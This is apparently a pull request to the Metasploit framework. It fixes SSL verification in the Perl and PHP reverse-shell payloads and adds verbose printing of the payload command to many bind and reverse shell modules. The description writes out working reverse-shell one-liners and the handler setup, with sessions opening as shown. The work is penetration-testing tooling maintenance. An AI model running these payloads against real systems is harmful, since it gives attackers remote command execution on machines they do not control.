### PR TITLE
Fix reverse php\perl ssl bug

### DIFF
--- a/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb
+++ b/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb
@@ -49,6 +49,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_inetd.rb
+++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb
@@ -39,6 +39,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_lua.rb
+++ b/modules/payloads/singles/cmd/unix/bind_lua.rb
@@ -41,6 +41,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -43,6 +43,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_perl.rb
+++ b/modules/payloads/singles/cmd/unix/bind_perl.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_ruby.rb
+++ b/modules/payloads/singles/cmd/unix/bind_ruby.rb
@@ -31,6 +31,7 @@ module MetasploitModule
   end
 
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb
@@ -31,6 +31,7 @@ module MetasploitModule
   end
 
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/bind_socat_udp.rb
+++ b/modules/payloads/singles/cmd/unix/bind_socat_udp.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/generic.rb
+++ b/modules/payloads/singles/cmd/unix/generic.rb
@@ -43,6 +43,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse.rb
+++ b/modules/payloads/singles/cmd/unix/reverse.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_bash.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb
@@ -44,6 +44,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
@@ -47,6 +47,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_lua.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_lua.rb
@@ -41,6 +41,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -43,6 +43,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_openssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_perl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 144
+  CachedSize = 173
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions

--- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
@@ -50,7 +50,7 @@ module MetasploitModule
     ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
     cmd = "perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);"
-    cmd += "$c=IO::Socket::SSL->new(\"#{lhost}:#{datastore['LPORT']}\");"
+    cmd += "$c=IO::Socket::SSL->new(PeerAddr=>\"#{lhost}:#{datastore['LPORT']}\",SSL_verify_mode=>0);"
     cmd += "while(sysread($c,$i,8192)){syswrite($c,`$i`);}'"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -49,6 +49,6 @@ module MetasploitModule
     lhost = datastore['LHOST']
     ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
+    cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false,\"verify_peer_name\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 253
+  CachedSize = 279
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -35,6 +35,7 @@ module MetasploitModule
   end
 
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb
@@ -31,6 +31,7 @@ module MetasploitModule
   end
 
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb
@@ -38,6 +38,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
+    vprint_good(command_string)
     return super + command_string
   end
 

--- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
@@ -41,7 +41,7 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate
-
+    vprint_good(command_string)
     return super + command_string
   end
 


### PR DESCRIPTION
Fix a bug when we try to use `reverse_perl_ssl` and `reverse_php_ssl`.

And print verbose command for connecting back when starting handler, which could be more friendly.

## Before fix

Start handler
```
use exploit/multi/handler
set payload cmd/unix/reverse_perl_ssl
setg lhost 127.0.0.1
set lport 2332
setg exitonsession false
exploit -z -j
set payload cmd/unix/reverse_php_ssl
set lport 2334
exploit -z -j
```

Connect to handler

Perl
```
perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new("127.0.0.1:2332");while(sysread($c,$i,8192)){syswrite($c,`$i`);}'

```

PHP
```
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false]]);while($s=@stream_socket_client("ssl://127.0.0.1:2334",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'
```

We cannot get any stable shell.
![image](https://user-images.githubusercontent.com/22535454/66713385-e0b42080-eddc-11e9-9a1e-070ddc2ae357.png)

This test code would explain:
```
root@kali:/tmp# perl -e 'use IO::Socket::SSL;my $client = IO::Socket::SSL->new("127.0.0.1:2332") or die "error=$!, ssl_error=$SSL_ERROR";'
error=, ssl_error=SSL connect attempt failed error:1416F086:SSL routines:tls_process_server_certificate:certificate verify failed at -e line 1.

```

## Verification (Fixed)

Perl
```
msf5 exploit(multi/handler) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_perl_ssl
payload => cmd/unix/reverse_perl_ssl
msf5 exploit(multi/handler) > setg lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 2332
lport => 2332
msf5 exploit(multi/handler) > setg exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -z -j

[+] perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"127.0.0.1:2332",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse SSL handler on 127.0.0.1:2332
msf5 exploit(multi/handler) > [*] Command shell session 3 opened (127.0.0.1:2332 -> 127.0.0.1:56975) at 2019-10-13 17:18:27 +0800
msf5 exploit(multi/handler) >

```

PHP
```
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_php_ssl
payload => cmd/unix/reverse_php_ssl
msf5 exploit(multi/handler) > set lport 2334
lport => 2334
msf5 exploit(multi/handler) > exploit -z -j

[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://127.0.0.1:2334",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse SSL handler on 127.0.0.1:2334
msf5 exploit(multi/handler) > [*] Command shell session 4 opened (127.0.0.1:2334 -> 127.0.0.1:57033) at 2019-10-13 17:19:11 +0800
```

